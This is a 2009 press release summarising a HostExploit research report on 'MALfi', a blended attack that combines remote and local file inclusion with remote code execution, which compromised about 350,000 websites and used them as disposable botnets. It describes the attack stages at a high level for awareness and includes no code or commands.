Cyber Crime International – MALfi

A new cybercrime report from HostExploit.com the producers of the definitive reports
exposing RBN (Russian Business Network), Atrivo, McColo, Real Host, and a foremost
source of rogue network activity analysis on the Internet.

Download the report here.

MALfi “A Silent Threat”

What is it all about, MALfi? A blended threat currently detected on around 350,000 websites &
Internet servers. One major purpose is to establish, “use once and throw away” disposable
botnets for spam, phishing, DDoS and exploits.
Full Report (public version) download PDF – HostExploit Download page = http://bit.ly/eoO4C

Abstract / Press Release

MALfi is a holistic and descriptive term applied to adequately describe the recent blended attack
utilized by hackers and cyber criminals to compromise websites and servers. This is
combination of RFI (remote file inclusion), LFI (local file inclusion), XSA (cross server attack),
and RCE (remote code execution).

Conservative estimates over recent months indicate around 350,000 affected websites and
servers worldwide. HostExploit and associated researchers have tracked 103,351 attacks,
involving 2,743 unique IP addresses, with 85 countries involved in RFI scanning and 911 ASNs
involved.

RFI is used by hackers to compromise websites and upload a remote user interface shell. This
ensures partial to full manual and unauthorized control over the server. This differs from the
now familiar “drive by” web site exploit as it provides hackers with a ready-made arena where
internet plunder in the form of information, controlled servers and web sites are exchanged or
resold to cyber criminal groups.

Essentially the RFI hackers continuously and automatically search for website vulnerabilities for
exploitation. Once breached, the websites and often the now compromised underlying servers,
are utilized for DDoS (distributed denial of service) attacks such as the recent US and Korean
government DDoS, spamming, phishing, large scale ID theft and to facilitate further attacks on
other targets. It follows that many of the regular and apparently attempted attacks on various
high volume governmental and key servers were RFI and similar vulnerability scanning, bots
and scripts.

In comparing RFI and SQL injection / viruses / worms, RFI scanning, and related exploitation,
happens continuously and affects all corners of the Internet. Both un-patched windows systems
and systems with RFI vulnerabilities are on a theoretical time to live?.

The three distinct stages of this serious but silent threat to Internet security are:

First stage – Remote File Inclusion Attack: Hacked websites and servers are not infectious to
the web visitor and remain undetected by most AV vendors including, for example, Google?s
safe browsing feature. This “crack in the door” provides for the second stage.

Second stage – Doing Damage: Here the compromised websites and servers have attacker
tools uploaded. These consist of both purchased and custom written tools to conduct nefarious
activities such as sending phishing emails, hosting phishing sites, sending SPAM, hosting
malware, defacing, DDoS and much more. XSA (Cross server attacks), LFI (local file inclusion),
and RCE (remote file inclusion) further compromise the system or other remote systems.

Third stage – Detection Avoidance: Upon completion of the cybercriminal action or discovery of
their attack, the miscreant removes their tools or causes them to self destruct before moving on.
With full control of the system, covering their tracks is accomplished easily.

With this technique there is no master server and no simple tracking. The compromised servers
are controlled via various anonymous web proxies and compromised hosts, in a totally de-
centralized manner. IRC (internet relay chat) is primarily used in a cell like communication
structure to co-ordinate efforts and to launch vulnerability scans.

Identification of specific botnets such as Storm or Cutwail has been used to gather valuable
cyber criminal intelligence but the de-centralized nature of RFI based attacks requires deeper
investigation and wider application of fundamental COMINT (communication intelligence)
techniques. Even after being discovered, hackers using the RFI technique still have the
compromised web sites to re-launch from or even to re-utilize. The whole process begins again
with scanning for vulnerabilities with a new disposable single use botnet.

The how, what and where of this particular hacking technique and cybercrime business model
are provided together with detailed and graphic explanations in the HostExploit community
research report.

For report download here - for further information contact:

Jart Armin – jart (at) jartarmin.com,

Scott D Logan - scott (at) hostexploit.com,

General enquiries - admin (at) hostexploit.com

Release Date - Nov 11th 2009